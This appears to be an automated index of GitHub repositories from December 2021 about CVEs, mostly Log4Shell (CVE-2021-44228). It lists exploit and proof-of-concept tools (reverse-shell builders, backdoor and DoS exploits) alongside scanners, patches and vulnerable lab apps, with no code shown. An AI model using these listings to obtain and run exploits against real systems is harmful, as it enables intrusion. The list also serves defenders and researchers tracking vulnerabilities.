**Script to create a log4j (CVE-2021-44228) exploit with support for different methods of getting a reverse shell** : [a5tra/log4j-exploit-builder](https://github.com/a5tra/log4j-exploit-builder) create time: 2021-12-29T17:41:48Z

**Auerswald VoIP System Secret Backdoors -PoC** : [pussycat0x/CVE-2021-40859](https://github.com/pussycat0x/CVE-2021-40859) create time: 2021-12-29T15:15:38Z

**no description** : [Asbatel/CVE-2019-5736_POC](https://github.com/Asbatel/CVE-2019-5736_POC) create time: 2021-12-29T13:48:42Z

**no description** : [trganda/CVE-2021-22204](https://github.com/trganda/CVE-2021-22204) create time: 2021-12-29T13:41:35Z

**Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more.** : [puzzlepeaches/Log4jUnifi](https://github.com/puzzlepeaches/Log4jUnifi) create time: 2021-12-24T13:18:49Z

**no description** : [d4rk30/CVE-2017-12943](https://github.com/d4rk30/CVE-2017-12943) create time: 2021-12-29T07:58:23Z

**Discover Log4Shell vulnerability [CVE-2021-45105]** : [name/log4j](https://github.com/name/log4j) create time: 2021-12-29T08:22:41Z

**Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun.** : [Bhagwatjadhav1997/tryhackme-Solar-exploiting-log4j](https://github.com/Bhagwatjadhav1997/tryhackme-Solar-exploiting-log4j) create time: 2021-12-29T07:46:28Z

**基于GO的exp和poc** : [damit5/CVE-2020-11546](https://github.com/damit5/CVE-2020-11546) create time: 2021-12-29T06:51:36Z

**CVE-2021-45232 POC** : [Ifory885/CVE-2021-45232](https://github.com/Ifory885/CVE-2021-45232) create time: 2021-12-29T05:43:12Z

**no description** : [LTiDi2000/CVE-2021-45232](https://github.com/LTiDi2000/CVE-2021-45232) create time: 2021-12-28T17:56:59Z

**no description** : [Ilovewomen/cve-2021-45232](https://github.com/Ilovewomen/cve-2021-45232) create time: 2021-12-29T01:01:16Z

**CVE-2019-9053 Exploit for Python 3** : [4nner/CVE-2019-9053](https://github.com/4nner/CVE-2019-9053) create time: 2021-12-28T16:30:12Z

**CVE-2021-45232 RCE** : [shakeman8/CVE-2021-45232-RCE](https://github.com/shakeman8/CVE-2021-45232-RCE) create time: 2021-12-28T13:49:18Z

**Fix: CVE-2021-44228 4LOGJ** : [tslenter/RS4LOGJ-CVE-2021-44228](https://github.com/tslenter/RS4LOGJ-CVE-2021-44228) create time: 2021-12-28T13:32:16Z

**Auerswald COMpact 8.0B Backdoors exploit** : [419066074/CVE-2021-40859](https://github.com/419066074/CVE-2021-40859) create time: 2021-12-28T06:05:42Z

**no description** : [badboycxcc/CVE-2021-45232-POC](https://github.com/badboycxcc/CVE-2021-45232-POC) create time: 2021-12-28T13:08:34Z

**A vulnerability scanner that detects CVE-2021-45232 vulnerabilities.** : [Osyanina/westone-CVE-2021-45232-scanner](https://github.com/Osyanina/westone-CVE-2021-45232-scanner) create time: 2021-12-28T11:36:38Z

**no description** : [pingpongcult/CVE-2021-4523](https://github.com/pingpongcult/CVE-2021-4523) create time: 2021-12-28T11:00:29Z

**no description** : [Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main](https://github.com/Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main) create time: 2021-12-27T17:06:26Z

**Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit** : [MRacumen/CVE-2021-40444](https://github.com/MRacumen/CVE-2021-40444) create time: 2021-12-28T06:33:25Z

**Auerswald COMpact 8.0B Backdoors exploit** : [dorkerdevil/CVE-2021-40859](https://github.com/dorkerdevil/CVE-2021-40859) create time: 2021-12-28T04:51:58Z

**Lavel Expliot CVE-2018-15133 / An Expliot I wrote a long time ago for a CTF box.** : [NatteeSetobol/CVE-2018-15133-Lavel-Expliot](https://github.com/NatteeSetobol/CVE-2018-15133-Lavel-Expliot) create time: 2021-12-28T02:33:13Z

**PoC for CVE-2021-45041** : [manuelz120/CVE-2021-45041](https://github.com/manuelz120/CVE-2021-45041) create time: 2021-12-27T19:29:34Z

**Quick and dirty scanner, hitting common ports looking for Log4Shell (CVE-2021-44228) vulnerability** : [LinkMJB/log4shell_scanner](https://github.com/LinkMJB/log4shell_scanner) create time: 2021-12-27T19:36:29Z

**log4j-paylaod generator : A generic payload generator for Apache log4j RCE CVE-2021-44228** : [yesspider-hacker/log4j-payload-generator](https://github.com/yesspider-hacker/log4j-payload-generator) create time: 2021-12-27T18:02:15Z

**Log4Shell (Cve-2021-44228) Proof Of Concept** : [s-retlaw/l4s_poc](https://github.com/s-retlaw/l4s_poc) create time: 2021-12-27T16:45:58Z

**SuperWebMailer RCE** : [Official-BlackHat13/CVE-2020-11546](https://github.com/Official-BlackHat13/CVE-2020-11546) create time: 2021-12-27T14:18:31Z

**Detection script for CVE-2021-42278 and CVE-2021-42287** : [cybersecurityworks553/noPac-detection](https://github.com/cybersecurityworks553/noPac-detection) create time: 2021-12-27T13:10:45Z

**IOCs for CVE-2021-44228** : [cungts/VTI-IOCs-CVE-2021-44228](https://github.com/cungts/VTI-IOCs-CVE-2021-44228) create time: 2021-12-27T09:51:13Z

**Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j** : [mazhar-hassan/log4j-vulnerability](https://github.com/mazhar-hassan/log4j-vulnerability) create time: 2021-12-27T06:39:40Z

**CVE-2021-44228** : [ceyhuncamli/Log4j_Attacker_IPList](https://github.com/ceyhuncamli/Log4j_Attacker_IPList) create time: 2021-12-27T06:29:12Z

**no description** : [Ming119/CVE-2021-41773_Exploit](https://github.com/Ming119/CVE-2021-41773_Exploit) create time: 2021-12-26T16:48:57Z

**opencast cve-2021-43821敏感信息泄露漏洞环境** : [Jackey0/opencast-cve-2021-43821-env](https://github.com/Jackey0/opencast-cve-2021-43821-env) create time: 2021-12-26T09:04:43Z

**no description** : [Dilshan-Eranda/CVE-2020-13699](https://github.com/Dilshan-Eranda/CVE-2020-13699) create time: 2021-12-26T00:06:27Z

**This is a basic ROP based exploit for CVE 2020-14871. CVE 2020-14871 is a vulnerability in Sun Solaris systems libpam library, and exploitable over ssh** : [robidev/CVE-2020-14871-Exploit](https://github.com/robidev/CVE-2020-14871-Exploit) create time: 2021-12-25T21:27:59Z

**Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.** : [bsigouin/log4shell-vulnerable-app](https://github.com/bsigouin/log4shell-vulnerable-app) create time: 2021-12-24T20:00:12Z

**this repository contains a POC of CVE-2021-44228 (log4j2shell) as part of a security research** : [ToxicEnvelope/XSYS-Log4J2Shell-Ex](https://github.com/ToxicEnvelope/XSYS-Log4J2Shell-Ex) create time: 2021-12-25T12:53:13Z

**CVE-2019-9053 SQL Injection for CMS Made Simple for versions < 2.2.9** : [BernieLane/CMS-Made-Simple-SQLi](https://github.com/BernieLane/CMS-Made-Simple-SQLi) create time: 2021-12-25T03:18:26Z

**Collection of materials relating to FORCEDENTRY, will eventually delete this repo and migrate the materials to my main exploit repo once finished** : [jeffssh/CVE-2021-30860](https://github.com/jeffssh/CVE-2021-30860) create time: 2021-12-25T03:00:01Z

**A simple exploitation guide for CVE-2021-44228.** : [CrashOverflow/Log4J-POC](https://github.com/CrashOverflow/Log4J-POC) create time: 2021-12-24T19:26:36Z

**This project is exploit for some docker containers with similar to vulnerability code: CVE-2020-35191** : [megadimenex/MegaHiDocker](https://github.com/megadimenex/MegaHiDocker) create time: 2021-12-24T18:59:31Z

**Log4j2 CVE-2021-44228 Vulnerability POC in Apache Tomcat** : [many-fac3d-g0d/apache-tomcat-log4j](https://github.com/many-fac3d-g0d/apache-tomcat-log4j) create time: 2021-12-24T18:54:46Z

**Small example repo for looking into log4j CVE-2021-44228** : [LiveOverflow/log4shell](https://github.com/LiveOverflow/log4shell) create time: 2021-12-15T19:59:38Z

**Log4Shell (CVE-2021-44228) docker lab** : [axelcurmi/log4shell-docker-lab](https://github.com/axelcurmi/log4shell-docker-lab) create time: 2021-12-18T19:30:35Z

**A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability.** : [cybersecurityworks553/log4j-shell-csw](https://github.com/cybersecurityworks553/log4j-shell-csw) create time: 2021-12-24T09:26:38Z

**Log4Shell(CVE-2021-45046) Sandbox Signature** : [CaptanMoss/Log4Shell-Sandbox-Signature](https://github.com/CaptanMoss/Log4Shell-Sandbox-Signature) create time: 2021-12-24T09:02:55Z

**log4j / log4shell IoCs from multiple sources put together in one big file (IPs) more coming soon (CVE-2021-44228)** : [hackinghippo/log4shell_ioc_ips](https://github.com/hackinghippo/log4shell_ioc_ips) create time: 2021-12-13T16:39:16Z

**general purpose workaround for the log4j CVE-2021-44228 vulnerability** : [grimch/log4j-CVE-2021-44228-workaround](https://github.com/grimch/log4j-CVE-2021-44228-workaround) create time: 2021-12-24T04:23:17Z

**CVE-2021-44228 检查工具** : [ainrm/log4j-scan](https://github.com/ainrm/log4j-scan) create time: 2021-12-24T02:31:47Z

**Discover and remediate Log4Shell vulnerability [CVE-2021-45105]** : [sakuraji-labs/sakuraji_log4j](https://github.com/sakuraji-labs/sakuraji_log4j) create time: 2021-12-23T21:45:42Z

**no description** : [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1) create time: 2021-12-23T17:46:02Z

**Environment with vulnerable kernel for exploitiation of CVE-2021-44733** : [pjlantz/optee-qemu](https://github.com/pjlantz/optee-qemu) create time: 2021-12-23T17:45:35Z

**CVE-2020-0683 - Windows MSI “Installer service” Elevation of Privilege** : [padovah4ck/CVE-2020-0683](https://github.com/padovah4ck/CVE-2020-0683) create time: 2020-02-11T16:42:34Z

**Apache 远程代码执行 (CVE-2021-42013)批量检测工具:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。** : [asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp](https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp) create time: 2021-12-23T14:46:41Z

**Apache HTTP Server是开源网页服务器的Apache(Apache)基金会。该服务器具有快速、可靠和可通过简单的API进行扩充的特点,发现修复CVE-2021-41773的Apache HTTP Server 2.4.50是不够的。攻击者可以使用路径遍历攻击映射URL到目录之外的指令配置的别名。如果这些请求可能会成功,这些请求可能会成功,但这些目录不受通常默认配置“要求全部拒绝”。如果CGI脚本还启用了这些别名路径,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响更早版本。** : [asaotomo/CVE-2021-42013-Apache-RCE-POC-EXP](https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-POC-EXP) create time: 2021-12-23T14:09:16Z

**Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4Shell (CVE-2021-44228).** : [lucab85/ansible-role-log4shell](https://github.com/lucab85/ansible-role-log4shell) create time: 2021-12-23T13:24:41Z

**no description** : [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v) create time: 2021-12-23T11:41:25Z

**no description** : [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105) create time: 2021-12-23T11:40:49Z

**no description** : [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105) create time: 2021-12-23T11:38:32Z

**Log4Shell mitigation (CVE-2021-44228) - search and remove JNDI class from *log4j*.jar files on the system with Powershell (Windows)** : [sysadmin0815/Fix-Log4j-PowershellScript](https://github.com/sysadmin0815/Fix-Log4j-PowershellScript) create time: 2021-12-17T09:09:56Z

**open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability** : [TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit](https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit) create time: 2021-12-23T01:59:03Z

**Proof of Concept of apache log4j LDAP lookup vulnerability. CVE-2021-44228** : [0x3SC4L4T3/Apache-Log4j-POC](https://github.com/0x3SC4L4T3/Apache-Log4j-POC) create time: 2021-12-22T22:44:07Z

**vsFTPd 2.3.4 Backdoor Exploit CVE-2011-2523** : [whoamins/vsFTPd-2.3.4-exploit](https://github.com/whoamins/vsFTPd-2.3.4-exploit) create time: 2021-12-22T20:51:35Z

**Log4JChecker checks for CVE-2021-44228 vulnerability** : [NatteeSetobol/Log4JChecker](https://github.com/NatteeSetobol/Log4JChecker) create time: 2021-12-22T15:15:12Z

**no description** : [Mesh3l911/CVE-2021-44659](https://github.com/Mesh3l911/CVE-2021-44659) create time: 2021-12-22T14:46:21Z

**A tool to automatically obtain a shell using CVE-2021-44228. EDUCATIONAL AND TESTING PURPOSES ONLY. UNAUTHORISED USE OF THIS PROGRAM CAN RESULT IN PROCECUTION.** : [djungeldan/Log4Me](https://github.com/djungeldan/Log4Me) create time: 2021-12-19T19:37:48Z

**CVE-2021-44228-FIX-JARS** : [asyzdykov/cve-2021-44228-fix-jars](https://github.com/asyzdykov/cve-2021-44228-fix-jars) create time: 2021-12-22T10:16:22Z

**Generic Scanner for Apache log4j RCE CVE-2021-44228** : [r00thunter/Log4Shell](https://github.com/r00thunter/Log4Shell) create time: 2021-12-22T09:15:47Z

**A Smart Log4Shell/Log4j/CVE-2021-44228 Scanner** : [ossie-git/log4shell_sentinel](https://github.com/ossie-git/log4shell_sentinel) create time: 2021-12-22T08:35:04Z

**CVE-2021-33739 PoC Analysis** : [giwon9977/CVE-2021-33739_PoC_Analysis](https://github.com/giwon9977/CVE-2021-33739_PoC_Analysis) create time: 2021-09-24T03:33:02Z

**CVE-2021-44228 - Log4J Start To End Guide Book** : [NitinGavhane/CVE-2021-44228---Log4J](https://github.com/NitinGavhane/CVE-2021-44228---Log4J) create time: 2021-12-22T05:16:59Z

**CVE-2021-22205 的批量检测脚本** : [gardenWhy/Gitlab-CVE-2021-22205](https://github.com/gardenWhy/Gitlab-CVE-2021-22205) create time: 2021-12-22T04:30:17Z

**Log4Shell Demo with AWS** : [BabooPan/Log4Shell-CVE-2021-44228-Demo](https://github.com/BabooPan/Log4Shell-CVE-2021-44228-Demo) create time: 2021-12-22T03:34:40Z

**Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script** : [lucab85/log4j-cve-2021-44228](https://github.com/lucab85/log4j-cve-2021-44228) create time: 2021-12-21T22:14:24Z

**no description** : [halencarjunior/grafana-CVE-2021-43798](https://github.com/halencarjunior/grafana-CVE-2021-43798) create time: 2021-12-21T20:08:22Z

**Log4j2 CVE-2021-44228 hack demo for a springboot app** : [rejupillai/log4j2-hack-springboot](https://github.com/rejupillai/log4j2-hack-springboot) create time: 2021-12-21T17:40:02Z

**Decrypt FortiGate configuration secrets** : [gquere/CVE-2019-6693](https://github.com/gquere/CVE-2019-6693) create time: 2021-12-21T15:28:00Z

**POC for CVE-2021-44228 within Springboot** : [mn-io/log4j-spring-vuln-poc](https://github.com/mn-io/log4j-spring-vuln-poc) create time: 2021-12-21T15:00:58Z

**ConnectWise also known as ScreenConnect CVE-2019-16516** : [czz/ScreenConnect-UserEnum](https://github.com/czz/ScreenConnect-UserEnum) create time: 2021-12-17T21:34:20Z

**Blog Sample Code** : [motikan2010/RASP-CVE-2021-44228](https://github.com/motikan2010/RASP-CVE-2021-44228) create time: 2021-12-21T13:30:37Z

**Zoneminder 未授权访问Poc:ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程未认证攻击者浏览web根目录下的所有目录。** : [asaotomo/CVE-2016-10140-Zoneminder-Poc](https://github.com/asaotomo/CVE-2016-10140-Zoneminder-Poc) create time: 2021-12-21T13:17:10Z

**no description** : [gps1949/CVE-2021-43798](https://github.com/gps1949/CVE-2021-43798) create time: 2021-12-21T10:04:41Z

**This repo contains IoCs which are associated with exploitation of CVE-2021-4428.** : [CERT-hr/Log4Shell](https://github.com/CERT-hr/Log4Shell) create time: 2021-12-21T09:17:08Z

**Python script to detect Log4Shell Vulnerability CVE-2021-44228** : [Ghost086/Log4Shell-Scanner](https://github.com/Ghost086/Log4Shell-Scanner) create time: 2021-12-21T08:13:35Z

**相关的复现和文档** : [xx-zhang/apache-log4j2-CVE-2021-44228](https://github.com/xx-zhang/apache-log4j2-CVE-2021-44228) create time: 2021-12-21T06:03:18Z

**Webmin Local File Include (unauthenticated)** : [windsormoreira/CVE-2006-3392](https://github.com/windsormoreira/CVE-2006-3392) create time: 2021-12-21T04:18:21Z

**Samsung Printer SCX-6X55X Improper Access Control** : [windsormoreira/CVE-2021-42913](https://github.com/windsormoreira/CVE-2021-42913) create time: 2021-12-21T04:26:11Z

**Scan and patch tool for CVE-2021-44228 and related log4j concerns.** : [sassoftware/loguccino](https://github.com/sassoftware/loguccino) create time: 2021-12-21T03:01:36Z

**Windows Common Log File System Driver POC** : [KaLendsi/CVE-2021-43224-POC](https://github.com/KaLendsi/CVE-2021-43224-POC) create time: 2021-12-21T01:51:41Z

**Proof of Concept for CVE-2021-43891** : [parsiya/code-wsl-rce](https://github.com/parsiya/code-wsl-rce) create time: 2021-12-20T21:30:51Z

**POC of CVE-2021-45105** : [hackername0102/log4j](https://github.com/hackername0102/log4j) create time: 2021-12-20T21:27:55Z

**Vulnerable web application to test CVE-2021-42281 / log4shell and forensic artifacts from an example attack** : [snapattack/damn-vulnerable-log4j-app](https://github.com/snapattack/damn-vulnerable-log4j-app) create time: 2021-12-20T18:51:52Z

**Bash que instala los sploit CVE-2017-0781 y CVE-2017-0785 y lo necesario para su usos.** : [CarlosDelRosario7/sploit-bX](https://github.com/CarlosDelRosario7/sploit-bX) create time: 2021-12-20T18:14:36Z

**Application vulnerable to CVE-2021-44228.** : [erickrr-bd/TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp) create time: 2021-12-20T17:59:56Z

**Windows Batch Scrip to Fix the log4j-issue-CVE-2021-44228** : [chandru-gunasekaran/log4j-fix-CVE-2021-44228](https://github.com/chandru-gunasekaran/log4j-fix-CVE-2021-44228) create time: 2021-12-20T15:39:20Z

**no description** : [intel-xeon/CVE-2021-44228---detection-with-PowerShell](https://github.com/intel-xeon/CVE-2021-44228---detection-with-PowerShell) create time: 2021-12-20T15:38:07Z

**Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.** : [julian911015/Log4j-Scanner-Exploit](https://github.com/julian911015/Log4j-Scanner-Exploit) create time: 2021-12-20T15:22:50Z

**no description** : [offensity/CVE-2019-0708](https://github.com/offensity/CVE-2019-0708) create time: 2021-12-20T14:57:23Z

**Remote Mouse GUI 3.008 - Local Privilege Escalation** : [LeoBreaker1411/CVE-2021-35448](https://github.com/LeoBreaker1411/CVE-2021-35448) create time: 2021-12-20T15:15:15Z

**log4j2 RCE漏洞(CVE-2021-44228)内网扫描器,可用于在不出网的条件下进行漏洞扫描,帮助企业内部快速发现Log4jShell漏洞。** : [Y0-kan/Log4jShell-Scan](https://github.com/Y0-kan/Log4jShell-Scan) create time: 2021-12-20T13:41:35Z

**Shell script to fix Log4J jar files from CVE-2021-44228, a.k.a., #Log4Shell** : [dmitsuo/log4shell-war-fixer](https://github.com/dmitsuo/log4shell-war-fixer) create time: 2021-12-20T13:18:57Z

**Log4j 漏洞本地检测脚本。 Scan all java processes on your host to check weather it's affected by log4j2 remote code execution(CVE-2021-45046)** : [lijiejie/log4j2_vul_local_scanner](https://github.com/lijiejie/log4j2_vul_local_scanner) create time: 2021-12-20T12:07:41Z

**A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks** : [JagarYousef/log4j-dork-scanner](https://github.com/JagarYousef/log4j-dork-scanner) create time: 2021-12-20T12:01:52Z

**log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc** : [iAmSOScArEd/log4j2_dos_exploit](https://github.com/iAmSOScArEd/log4j2_dos_exploit) create time: 2021-12-20T10:52:20Z

**no description** : [bumheehan/cve-2021-44228-log4j-test](https://github.com/bumheehan/cve-2021-44228-log4j-test) create time: 2021-12-20T11:07:21Z

**no description** : [ramirosantos/POC-for-CVE-2021-44228-with-Kali](https://github.com/ramirosantos/POC-for-CVE-2021-44228-with-Kali) create time: 2021-12-20T10:40:32Z

**no description** : [ramirosantos/Apache-Log4j-Zero-Day-aka-Log4Shell-aka-CVE-2021-44228](https://github.com/ramirosantos/Apache-Log4j-Zero-Day-aka-Log4Shell-aka-CVE-2021-44228) create time: 2021-12-20T10:34:06Z

**log4j2 Log4Shell CVE-2021-44228 proof of concept** : [spasam/log4j2-exploit](https://github.com/spasam/log4j2-exploit) create time: 2021-12-20T03:16:01Z

**a project written in go and java i abandoned for CVE-2021-44228 try to fix it if you can XD** : [ArkAngeL43/f-for-java](https://github.com/ArkAngeL43/f-for-java) create time: 2021-12-20T01:31:06Z

**Replicating CVE-2021-45105** : [tejas-nagchandi/CVE-2021-45105](https://github.com/tejas-nagchandi/CVE-2021-45105) create time: 2021-12-19T23:22:25Z

**L4Shunter - Log4Shell Hunter - Remote scanner for CVE-2021-44228 or CVE-2021-45046** : [sudo6/l4shunter](https://github.com/sudo6/l4shunter) create time: 2021-12-19T21:39:28Z

**Exploiting CVE-2021-44228 in vCenter for remote code execution and more.** : [puzzlepeaches/Log4jCenter](https://github.com/puzzlepeaches/Log4jCenter) create time: 2021-12-19T14:48:30Z

**A Proof of Concept of the Log4j vulnerabilities (CVE-2021-44228) over Java-RMI** : [Labout/log4shell-rmi-poc](https://github.com/Labout/log4shell-rmi-poc) create time: 2021-12-19T17:53:31Z

**A telegram bug that allows to bruteforce and find hidden mobile phone number of any user (CVE-2019-15514)** : [graysuit/CVE-2019-15514](https://github.com/graysuit/CVE-2019-15514) create time: 2021-12-10T19:03:53Z

**A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228** : [Rk-000/Log4j_scan_Advance](https://github.com/Rk-000/Log4j_scan_Advance) create time: 2021-12-19T14:20:54Z

**Demo to show how Log4Shell / CVE-2021-44228 vulnerability works** : [mschmnet/Log4Shell-demo](https://github.com/mschmnet/Log4Shell-demo) create time: 2021-12-19T10:57:16Z

**CVE-2021-40444** : [34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit](https://github.com/34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit) create time: 2021-12-19T08:16:07Z

**Identifying all log4j components across on local windows servers. CVE-2021-44228** : [KeysAU/Get-log4j-Windows-local](https://github.com/KeysAU/Get-log4j-Windows-local) create time: 2021-12-19T07:35:01Z

**Vulerability analysis, patch management and exploitation tool CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104** : [TheInterception/Log4J-Simulation-Tool](https://github.com/TheInterception/Log4J-Simulation-Tool) create time: 2021-12-19T05:13:25Z

**An Inspec profile to check for Log4j CVE-2021-44228 and CVE-2021-45046** : [trickyearlobe/inspec-log4j](https://github.com/trickyearlobe/inspec-log4j) create time: 2021-12-19T04:04:57Z

**no description** : [kkyehit/log4j_CVE-2021-44228](https://github.com/kkyehit/log4j_CVE-2021-44228) create time: 2021-12-19T03:47:54Z

**Searches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances, including embedded (jar/war/zip) packaged ones.** : [HynekPetrak/log4shell_finder](https://github.com/HynekPetrak/log4shell_finder) create time: 2021-12-14T22:27:14Z

**This is a showcase how the Log4J vulnerability (CVE-2021-44228) could be explored. This code is safe to run, but understand what it does and how it works!** : [otaviokr/log4j-2021-vulnerability-study](https://github.com/otaviokr/log4j-2021-vulnerability-study) create time: 2021-12-18T20:53:06Z

**Automated pentesting tools and vulnerability fixes for Log4Shell CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104** : [TheInterception/Log4JPentester](https://github.com/TheInterception/Log4JPentester) create time: 2021-12-18T17:59:24Z

**Detections for CVE_2021_44228 aka Log4j** : [initconf/log4j](https://github.com/initconf/log4j) create time: 2021-12-18T17:30:28Z

**no description** : [111coding/log4j_temp_CVE-2021-44228](https://github.com/111coding/log4j_temp_CVE-2021-44228) create time: 2021-12-15T14:01:23Z

**A fun activity using a packet capture file from the log4j exploit (CVE-2021-44228)** : [Apipia/log4j-pcap-activity](https://github.com/Apipia/log4j-pcap-activity) create time: 2021-12-18T16:09:49Z

**no description** : [pravin-pp/log4j2-CVE-2021-45105](https://github.com/pravin-pp/log4j2-CVE-2021-45105) create time: 2021-12-18T14:24:46Z

**Detect and fix log4j log4shell vulnerability (CVE-2021-44228)** : [Nanitor/log4fix](https://github.com/Nanitor/log4fix) create time: 2021-12-16T11:54:11Z

**Scan systems and docker images for potential log4j vulnerabilities. Able to patch (remove JndiLookup.class) from layered archives. Will detect in-depth (layered archives jar/zip/tar/war and scans for vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105). Binaries for Windows, Linux and OsX, but can be build on each platform supported by supported Golang.** : [dtact/divd-2021-00038--log4j-scanner](https://github.com/dtact/divd-2021-00038--log4j-scanner) create time: 2021-12-12T12:16:07Z

**Log4j_dos_CVE-2021-45105** : [cckuailong/Log4j_dos_CVE-2021-45105](https://github.com/cckuailong/Log4j_dos_CVE-2021-45105) create time: 2021-12-18T12:54:44Z

**no description** : [ramirosantos/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab](https://github.com/ramirosantos/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab) create time: 2021-12-18T12:50:28Z

**no description** : [ramirosantos/CVE-2021-44228-poc](https://github.com/ramirosantos/CVE-2021-44228-poc) create time: 2021-12-18T12:50:04Z

**Self-contained lab environment that runs the exploit safely, all from docker compose** : [j3kz/CVE-2021-44228-PoC](https://github.com/j3kz/CVE-2021-44228-PoC) create time: 2021-12-18T12:42:04Z

**Look for JAR files that vulnerable to Log4j RCE (CVE‐2021‐44228)** : [dwisiswant0/look4jar](https://github.com/dwisiswant0/look4jar) create time: 2021-12-18T11:39:38Z

**no description** : [ludy-dev/cve-2021-45046](https://github.com/ludy-dev/cve-2021-45046) create time: 2021-12-18T11:43:56Z

**An attempt to understand the log4j vulnerability by looking through the code** : [shivakumarjayaraman/log4jvulnerability-CVE-2021-44228](https://github.com/shivakumarjayaraman/log4jvulnerability-CVE-2021-44228) create time: 2021-12-18T11:23:35Z

**A scanning suite to find servers affected by the log4shell flaw (CVE-2021-44228) with example to test it** : [suniastar/scan-log4shell](https://github.com/suniastar/scan-log4shell) create time: 2021-12-18T11:16:06Z

**no description** : [shmilylty/cve-2021-22005-exp](https://github.com/shmilylty/cve-2021-22005-exp) create time: 2021-12-18T08:18:50Z

**CVE-2021-44228 Getshell** : [shakeman8/log4j_getshell](https://github.com/shakeman8/log4j_getshell) create time: 2021-12-18T06:41:56Z

**CVE-2021-4438 LOG4J - Remote excution** : [longnguyen-2k/log4j](https://github.com/longnguyen-2k/log4j) create time: 2021-12-18T04:26:44Z

**no description** : [Pengfei-Lu/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/Pengfei-Lu/CVE-2021-44228-Apache-Log4j-Rce) create time: 2021-12-18T00:58:32Z

**can find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046** : [DANSI/PowerShell-Log4J-Scanner](https://github.com/DANSI/PowerShell-Log4J-Scanner) create time: 2021-12-18T00:51:46Z

**A vulnerable device scanner for CVE-2021-44228 (Log4j)** : [sblmnl/Scan4j](https://github.com/sblmnl/Scan4j) create time: 2021-12-17T20:46:34Z

**A simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228.** : [lukepasek/log4jjndilookupremove](https://github.com/lukepasek/log4jjndilookupremove) create time: 2021-12-17T18:59:16Z

**no description** : [VerveIndustrialProtection/CVE-2021-44228-Log4j](https://github.com/VerveIndustrialProtection/CVE-2021-44228-Log4j) create time: 2021-12-15T18:51:07Z

**This project will help to test the Log4j CVE-2021-44228 vulnerability.** : [immunityinc/Log4j-JNDIServer](https://github.com/immunityinc/Log4j-JNDIServer) create time: 2021-12-17T20:07:12Z

**Docker images and k8s YAMLs for Log4j Vulnerability POC (Log4j (CVE-2021-44228 RCE Vulnerability)** : [ankur-katiyar/log4j-docker](https://github.com/ankur-katiyar/log4j-docker) create time: 2021-12-17T19:50:40Z

**no description** : [nu11secur1ty/CVE-2021-44228-VULN-APP](https://github.com/nu11secur1ty/CVE-2021-44228-VULN-APP) create time: 2021-12-17T18:45:19Z

**CVE-2021-44228** : [ermohitrathore/detect-log4j-exploitable](https://github.com/ermohitrathore/detect-log4j-exploitable) create time: 2021-12-17T18:03:50Z

**A tool to analysis the log files from minecraft to scan potential security risks from the CVE-2021-44228 Log4J library exploit.** : [psychose-club/Saturn](https://github.com/psychose-club/Saturn) create time: 2021-12-12T19:42:47Z

**no description** : [Nikolas-Charalambidis/cve-2021-44228](https://github.com/Nikolas-Charalambidis/cve-2021-44228) create time: 2021-12-17T17:23:47Z

**Provide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself** : [Aschen/log4j-patched](https://github.com/Aschen/log4j-patched) create time: 2021-12-17T16:26:12Z

